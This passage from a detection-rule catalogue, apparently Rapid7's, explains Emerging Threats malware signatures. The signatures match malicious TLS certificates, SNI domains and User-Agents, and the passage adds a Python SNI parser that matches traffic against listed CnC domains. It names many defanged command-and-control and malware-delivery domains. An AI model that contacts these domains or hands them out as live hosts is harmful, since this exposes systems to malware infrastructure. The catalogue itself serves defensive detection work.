This detection identifies a TLS/SSL certificate associated with Zepakab command-and-control (CnC) infrastructure, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Zeromax Stealer CnC)

Description

This detection identifies a TLS/SSL certificate associated with command-and-control (CnC) infrastructure of the Zeromax information stealer, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Zloader CnC)

Description

This detection identifies a TLS/SSL certificate associated with Zloader command-and-control (CnC) infrastructure, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL/TLS Certificate (IcedID CnC)

Description

This detection identifies a TLS/SSL certificate associated with IcedID command-and-control (CnC) infrastructure, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL/TLS Certificate (Jasper CnC)

Description

This detection identifies a TLS/SSL certificate associated with Jasper command-and-control (CnC) infrastructure, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious UA (Skuxray)

Description

This detection identifies an HTTP User-Agent string used by the Skuxray malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malsmoke Staging Domain in SNI

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) names a domain used to stage Malsmoke payloads, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malware Delivery Domain (analyticsnet .top in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is analyticsnet .top, a domain used to deliver malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malware Delivery Landing Page Domain (bigeront .top in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is bigeront .top, a landing-page domain used in malware delivery, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MassLogger Domain in TLS SNI (ecigroup-tw .com)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is ecigroup-tw .com, a domain associated with the MassLogger keylogger and credential stealer, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MAZE Ransomware CnC Domain (checksoffice .me in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is checksoffice .me, a domain associated with MAZE ransomware command-and-control (CnC), as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed MAZE Ransomware CnC Domain (plaintsotherest .net in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is plaintsotherest .net, a domain associated with MAZE ransomware command-and-control (CnC), as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed MAZE Ransomware CnC Domain (thesawmeinrew .net in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is thesawmeinrew .net, a domain associated with MAZE ransomware command-and-control (CnC), as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed MongoLock Variant CnC Domain (s .rapid7 .xyz in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is s .rapid7 .xyz, a domain associated with command-and-control (CnC) of a MongoLock variant, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MSIL/Heracles Variant CnC Domain (stainless .fun in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is stainless .fun, a domain associated with command-and-control (CnC) of an MSIL/Heracles variant, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MSIL/n2019cov (COVID-19) Ransomware CnC Domain in TLS SNI

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) names a command-and-control (CnC) domain of the MSIL/n2019cov (COVID-19 themed) ransomware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Nemty Ransomware Payment Page

Description

This detection identifies a request to a Nemty ransomware payment page, as observed by Rapid7’s Insight Network Sensor. A host visiting the payment page may already have been encrypted. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed OSX/GMERA.A CnC Domain (appstockfolio .com in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is appstockfolio .com, a command-and-control (CnC) domain of the OSX/GMERA.A macOS malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed OSX/NukeSped Variant CnC Domain (fudcitydelivers .com) in TLS SNI

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is fudcitydelivers .com, a command-and-control (CnC) domain of an OSX/NukeSped variant, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed OSX/NukeSped Variant CnC Domain (sctemarkets .com) in TLS SNI

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is sctemarkets .com, a command-and-control (CnC) domain of an OSX/NukeSped variant, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed OSX/Silver Sparrow Download Domain in TLS SNI

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) names a domain used to download the OSX/Silver Sparrow macOS malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed OSX/WizardUpdate Domain in TLS SNI ( .dlvplayer .com)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is dlvplayer .com or a subdomain of it, a domain associated with the OSX/WizardUpdate macOS malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Pegasus Domain (api1r3f4 .redirectweburl .com in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is api1r3f4 .redirectweburl .com, a domain associated with the Pegasus spyware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Pegasus Domain (hooklevel .com in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is hooklevel .com, a domain associated with the Pegasus spyware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PHPs Labyrinth Stage2 CnC Domain in TLS SNI

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) names a second-stage command-and-control (CnC) domain of PHPs Labyrinth, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PoetRAT Domain (dellgenius .hoptop .org in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is dellgenius .hoptop .org, a domain associated with PoetRAT, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed PoetRAT Domain (slimip .accesscam .org in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is slimip .accesscam .org, a domain associated with PoetRAT, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Possible PowerSploit/PowerView .ps1 Inbound

Description

This detection identifies a PowerShell script resembling the PowerView module of PowerSploit being downloaded to an internal host, as observed by Rapid7’s Insight Network Sensor. PowerView is used to enumerate Active Directory users, groups, sessions and trusts, and is a common early step in lateral movement. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. PowerView is also used in authorized penetration tests, so confirm whether an assessment was in progress; otherwise treat the download as a sign that an attacker is enumerating Active Directory from the host. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ProtonBot User-Agent

Description

This detection identifies an HTTP User-Agent string used by the ProtonBot malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Puzzlemaker Remote Shell Domain (media-seoengine .com in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is media-seoengine .com, a domain used by the Puzzlemaker remote shell, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Qbot Style SSL Certificate

Description

This detection identifies a TLS/SSL certificate whose fields follow the pattern used by Qbot (Qakbot) command-and-control servers, rather than one specific known certificate, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Reimageplus Ransomware Domain in TLS SNI

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) names a domain associated with the Reimageplus ransomware, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Sidewinder APT User-Agent

Description

This detection identifies an HTTP User-Agent string used by tooling of the Sidewinder APT group, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Silver Implant Domain (raspoly .biz in TLS SNI)

Description

This detection identifies a TLS connection whose Server Name Indication (SNI) is raspoly .biz, a domain associated with the Silver implant, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SluttyPutty Maldoc User-Agent

Description

This detection identifies an HTTP User-Agent string sent by the SluttyPutty malicious-document (maldoc) downloader, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSL/TLS Cert (Splashtop Remote Support)

Description

This detection identifies a TLS/SSL certificate belonging to Splashtop Remote Support, as observed by Rapid7’s Insight Network Sensor. Splashtop is a legitimate remote-access product, but threat actors install it on compromised hosts to keep interactive access, so the alert indicates remote-control software rather than malware by itself. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question and confirm whether Splashtop is sanctioned for the host and user involved; unsanctioned remote-support software is a common precursor to hands-on-keyboard activity. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (be-government .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (drmtake .tk in TLS SNI)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host whose Server Name Indication (SNI) is drmtake .tk, a domain associated with SSV Agent command-and-control (CnC) infrastructure. The SNI is sent in cleartext at the start of the handshake (unless Encrypted Client Hello is in use), so the rule needs no decryption; the trade-off is that the alert only shows that the host tried to reach the domain, not what, if anything, was exchanged afterwards.

Recommendation

Review the alert in question: identify the source host and the process that opened the connection, correlate with the host's DNS lookup for the name, and check whether the handshake completed and data was exchanged. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (edgecloudc .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with edgecloudc .com in the SNI, another SSV Agent CnC domain. The match works the same way as the drmtake .tk rule above.

Recommendation

Handle as the other SSV Agent alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (flushcdn .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with flushcdn .com in the SNI, another SSV Agent CnC domain. The match works the same way as the drmtake .tk rule above.

Recommendation

Handle as the other SSV Agent alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (gitcloudcache .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with gitcloudcache .com in the SNI, another SSV Agent CnC domain. The match works the same way as the drmtake .tk rule above.

Recommendation

Handle as the other SSV Agent alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (hostupoeui .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with hostupoeui .com in the SNI, another SSV Agent CnC domain. The match works the same way as the drmtake .tk rule above.

Recommendation

Handle as the other SSV Agent alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed SSV Agent CnC Domain (rsnet-devel .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with rsnet-devel .com in the SNI, another SSV Agent CnC domain. The match works the same way as the drmtake .tk rule above.

Recommendation

Handle as the other SSV Agent alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.
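Most rules in this section match a CnC domain in the TLS SNI. The following script, added here as a worked example and not Rapid7 or Emerging Threats code, shows what that match involves: it parses the SNI extension out of a TLS ClientHello and compares it against the defanged domains copied from the rule titles above. The ClientHello bytes are constructed inside the script for testing; the domain list, the refang() helper and the subdomain-matching policy are this example's assumptions, not the sensor's.

```python
"""Added example: extract the SNI from a TLS ClientHello and match it against
the defanged CnC domains listed on this page. Not Rapid7 or Emerging Threats
code; the ClientHello bytes are constructed here for testing."""
import struct

# Domains copied from SSV Agent rule titles on this page, in the page's defanged form.
DEFANGED_C2_DOMAINS = [
    "drmtake .tk", "edgecloudc .com", "flushcdn .com", "gitcloudcache .com",
    "hostupoeui .com", "rsnet-devel .com",
]

def refang(domain: str) -> str:
    """'drmtake .tk' -> 'drmtake.tk'; also accepts the common '[.]' form."""
    return domain.replace(" .", ".").replace("[.]", ".").strip(".").lower()

def build_client_hello(server_name: str) -> bytes:
    """Build a minimal TLS 1.2 ClientHello record carrying one SNI entry.
    Constructed test input; real ClientHellos carry more cipher suites and
    extensions, which extract_sni() skips over without caring about them."""
    name = server_name.encode("idna")
    entry = b"\x00" + struct.pack("!H", len(name)) + name       # host_name (type 0)
    sni_list = struct.pack("!H", len(entry)) + entry
    sni_ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list
    body = (b"\x03\x03" + bytes(32)      # client_version, random
            + b"\x00"                    # session_id (empty)
            + b"\x00\x02\x13\x01"        # cipher_suites: one suite
            + b"\x01\x00"                # compression_methods: null
            + struct.pack("!H", len(sni_ext)) + sni_ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake

def extract_sni(record: bytes):
    """Return the lower-cased host_name from a ClientHello's SNI extension,
    or None if the bytes are not a ClientHello or carry no SNI."""
    if len(record) < 9 or record[0] != 0x16:           # not a Handshake record
        return None
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:                   # not a ClientHello
        return None
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    try:
        pos = 2 + 32                                   # skip version + random
        pos += 1 + body[pos]                           # session_id
        pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]   # cipher_suites
        pos += 1 + body[pos]                           # compression_methods
        if pos + 2 > len(body):
            return None                                # no extensions block
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            data, pos = body[pos + 4:pos + 4 + elen], pos + 4 + elen
            if etype != 0x0000:                        # not server_name
                continue
            q = 2                                      # skip ServerNameList length
            while q + 3 <= len(data):
                ntype, nlen = data[q], struct.unpack("!H", data[q + 1:q + 3])[0]
                q += 3
                if ntype == 0:
                    return data[q:q + nlen].decode("ascii", "replace").lower()
                q += nlen
    except (IndexError, struct.error):
        return None                                    # truncated or malformed
    return None

def match_c2(sni, c2_domains):
    """Exact or subdomain match (so 'cdn.flushcdn.com' hits 'flushcdn.com',
    but 'notflushcdn.com' does not). Returns the catalogued domain or None."""
    if not sni:
        return None
    for d in c2_domains:
        if sni == d or sni.endswith("." + d):
            return d
    return None

def scan(records, defanged=DEFANGED_C2_DOMAINS):
    """Run every record through the SNI parser; return (sni, matched_domain) hits."""
    c2 = [refang(d) for d in defanged]
    hits = []
    for rec in records:
        sni = extract_sni(rec)
        hit = match_c2(sni, c2)
        if hit:
            hits.append((sni, hit))
    return hits

if __name__ == "__main__":
    sample = [build_client_hello("drmtake.tk"),          # constructed: direct hit
              build_client_hello("cdn.flushcdn.com"),    # constructed: subdomain hit
              build_client_hello("www.example.org")]     # constructed: benign
    for sni, domain in scan(sample):
        print(f"ALERT: SNI {sni} matches catalogued CnC domain {domain}")
```

Two points the script makes concrete: the parser never touches encrypted data, because the SNI sits in the plaintext ClientHello, and a truncated or non-handshake record yields no SNI at all rather than a false match. The subdomain rule is a policy choice; an exact-match deployment would drop the endswith() branch.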

ET MALWARE Observed StrongPity CnC Domain (applicationrepo .com in TLS SNI)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host whose Server Name Indication (SNI) is applicationrepo .com, a domain associated with StrongPity command-and-control (CnC) infrastructure. The SNI is visible in cleartext before the session is encrypted, so the rule shows that the host attempted to reach the domain but not what was exchanged. StrongPity is known for delivering trojanized installers of legitimate software, so the origin of recently installed applications on the host is worth checking alongside the network evidence.

Recommendation

Review the alert in question: identify the source host and the process that opened the connection, and check whether the handshake completed and data was exchanged. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (hardwareoption .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with hardwareoption .com in the SNI, another StrongPity CnC domain; the match works as described for applicationrepo .com above.

Recommendation

Handle as the other StrongPity alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (hierarchicalfiles .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with hierarchicalfiles .com in the SNI, another StrongPity CnC domain; the match works as described for applicationrepo .com above.

Recommendation

Handle as the other StrongPity alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (hostoperationsystems .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with hostoperationsystems .com in the SNI, another StrongPity CnC domain; the match works as described for applicationrepo .com above.

Recommendation

Handle as the other StrongPity alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description

This title is shared by a number of rules in the catalog; their description and recommendation are identical, so they are listed here once. Each fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host whose Server Name Indication (SNI) is a domain associated with StrongPity command-and-control (CnC) infrastructure. Unlike the neighbouring StrongPity entries, the title does not name the domain, so take it from the alert details rather than from this page. The SNI is visible in cleartext before the session is encrypted, so the alert shows the attempt to reach the domain but not what was exchanged.

Recommendation

Review the alert in question: note the matched domain, identify the source host and the process that opened the connection, and check whether the handshake completed and data was exchanged. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (pulmonyarea .com in TLS SNI)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host with pulmonyarea .com in the Server Name Indication (SNI), a domain associated with StrongPity command-and-control (CnC) infrastructure. The SNI is sent in cleartext, so the alert shows that the host attempted to reach the domain but not what was exchanged.

Recommendation

Review the alert in question: identify the source host and the process that opened the connection, and check whether the handshake completed and data was exchanged. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (resolutionplatform .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with resolutionplatform .com in the SNI, another StrongPity CnC domain; the match works as described for pulmonyarea .com above.

Recommendation

Handle as the other StrongPity alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (uppertrainingtool .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with uppertrainingtool .com in the SNI, another StrongPity CnC domain; the match works as described for pulmonyarea .com above.

Recommendation

Handle as the other StrongPity alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity Domain (autoconfirmations .com in TLS SNI)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host with autoconfirmations .com in the Server Name Indication (SNI), a domain associated with StrongPity activity. The rule title says "Domain" rather than "CnC Domain", so the name may serve a role other than command and control (for example payload delivery); the alert still indicates contact with StrongPity infrastructure.

Recommendation

Review the alert in question: identify the source host and the process that opened the connection, and check whether the handshake completed and data was exchanged. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity Domain (lurkingnet .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with lurkingnet .com in the SNI, another domain associated with StrongPity activity; see the autoconfirmations .com entry above.

Recommendation

Handle as the other StrongPity alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity Domain (singlefunctionapp .com in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with singlefunctionapp .com in the SNI, another domain associated with StrongPity activity; see the autoconfirmations .com entry above.

Recommendation

Handle as the other StrongPity alerts in this section: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed TA471/UNC2589 Go Downloader User-Agent (-hobot-)

Description

This detection fires when Rapid7's Insight Network Sensor observes an HTTP request from a monitored host whose User-Agent header carries the string shown in the rule title, which is associated with a Go-based downloader used by the actor tracked as TA471/UNC2589. Because the match is on a plaintext HTTP header, the sensor can only see it on unencrypted connections or where TLS is terminated upstream of the sensor.

Recommendation

Review the alert in question: identify the process that sent the request and what it fetched (the downloader's purpose is to retrieve further payloads). If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (blog .br0vvnn .io)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host with blog .br0vvnn .io in the Server Name Indication (SNI). The domain belongs to a publicly reported targeted campaign that used social engineering against security researchers, so if the affected user works in vulnerability research or security engineering, treat the alert with corresponding urgency. The SNI is sent in cleartext, so the alert shows the attempt to reach the domain but not what was exchanged.

Recommendation

Review the alert in question: identify the source host, the process that opened the connection and how the user arrived at the domain (a link in a message or a social-media profile is typical for this campaign). If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (codevexillium .org)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with codevexillium .org in the SNI, another domain from the same targeted campaign described for blog .br0vvnn .io above.

Recommendation

Handle as the other Targeted Attack alerts in this section: review the alert, establish how the user reached the domain and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (krakenfolio .com)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with krakenfolio .com in the SNI, another domain from the same targeted campaign described for blog .br0vvnn .io above.

Recommendation

Handle as the other Targeted Attack alerts in this section: review the alert, establish how the user reached the domain and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (transferwiser .io)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with transferwiser .io in the SNI, another domain from the same targeted campaign described for blog .br0vvnn .io above. Note the look-alike spelling of a legitimate money-transfer brand, chosen to pass a casual glance.

Recommendation

Handle as the other Targeted Attack alerts in this section: review the alert, establish how the user reached the domain and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (transplugin .io)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with transplugin .io in the SNI, another domain from the same targeted campaign described for blog .br0vvnn .io above.

Recommendation

Handle as the other Targeted Attack alerts in this section: review the alert, establish how the user reached the domain and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious SSL Cert (angeldonationblog .com)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS server certificate, presented to a monitored host during a handshake, that carries angeldonationblog .com, a domain from the same publicly reported targeted campaign as the Targeted Attack SNI rules in this section. Unlike the SNI rules, this one matches the server's side of the handshake, so it also catches connections made by IP address or with a misleading SNI. The caveat is that TLS 1.3 encrypts the server certificate, so certificate-based rules only see TLS 1.2 and earlier handshakes.

Recommendation

Review the alert in question: identify the source host, the process that opened the connection and how the user reached the site. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Targeted Attack Malicious SSL Cert (investbooking .de)

Description

This detection fires when the Insight Network Sensor observes a TLS server certificate presented to a monitored host that carries investbooking .de, another domain from the same targeted campaign; the match and its TLS 1.3 limitation are as described for angeldonationblog .com above.

Recommendation

Handle as the other Targeted Attack alerts in this section: review the alert, establish how the user reached the site and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Targeted Attack Malicious SSL Cert (opsonew3org .sg)

Description

This detection fires when the Insight Network Sensor observes a TLS server certificate presented to a monitored host that carries opsonew3org .sg, another domain from the same targeted campaign; the match and its TLS 1.3 limitation are as described for angeldonationblog .com above.

Recommendation

